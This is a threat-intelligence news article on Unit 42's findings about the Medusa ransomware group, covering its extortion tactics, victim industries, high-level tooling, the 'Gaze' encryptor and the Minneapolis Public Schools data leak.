Medusa Ransomware Intensifies Attacks, Unit 42 Reports on Global Impact

An escalation of ransomware activity from the Medusa ransomware-as-a-service (RaaS) is reported by researchers from Unit 42. Not to be confused with MedusaLocker, ransomware operators from the Medusa ransomware gang are their distinct group. Their extortion tactics increased in early 2023 with their public-facing blog and Telegram channel for extortion, where they disclose sensitive data of non-compliant victims, adding pressure through public exposure and negotiated ransom demands. Medusa operators predominantly targeted Windows environments and leveraged sophisticated strategies including exploiting vulnerabilities and using initial access brokers for infiltration.

Medusa's operation is marked by multi-extortion techniques, offering victims options like time extensions, data deletion, or data download for a price. This group notably targets a wide range of industries, displaying an opportunistic nature typical of many ransomware groups. Based on the data collected by Unit 42, the most heavily impacted industries are (in order) those operating in technology, education, manufacturing, healthcare, wholesale, and retail. Their global footprint is extensive, with the United States being the most affected, followed by several European countries. Their tactics include the use of webshells for initial access, defense evasion through kernel drivers and software protectors, and reconnaissance using advanced tools like Netscan with custom configurations.

Prior to executing their encryptor, Unit 42 observed the operators deploying ASPX webshells, and utilizing PowerShell to download payloads with BitsAdmin. The files downloaded have included remote monitoring and management (RMM) software. Kernel drivers are also utilized to query and terminate security products running on the endpoint. Tools used during the discovery phases have included built-in Windows processes, Netscan, and scripts.

Their ransomware encryptor, aptly named 'Gaze', draws its moniker from a distinct pattern observed by Unit 42 in the ransomware's binary. This pattern, as they note, "aligns with the mythology of Medusa herself: the use and inclusion of the term gaze in the debug path." This binary is sophisticated in its approach, using string encryption and RSA asymmetric encryption to protect the AES256 key used for file encryption. The ransomware avoids certain file types and directories to maximize its impact and leaves a detailed ransom note in each affected directory. Additionally, Medusa's operators hinder recovery efforts and forensic analysis by deleting shadow copies and deleting its binary.

Like other cybercriminals, the Medusa group's operations exhibit ruthless behavior, as evidenced by their ransomware attack on the Minneapolis Public School (MPS) District in February 2023. This attack resulted in the leakage of 100GBs of sensitive data, including information about teachers and students. According to an NBC News analysis of the leaked files, the exposed data alarmingly included highly confidential reports detailing instances of student mistreatment.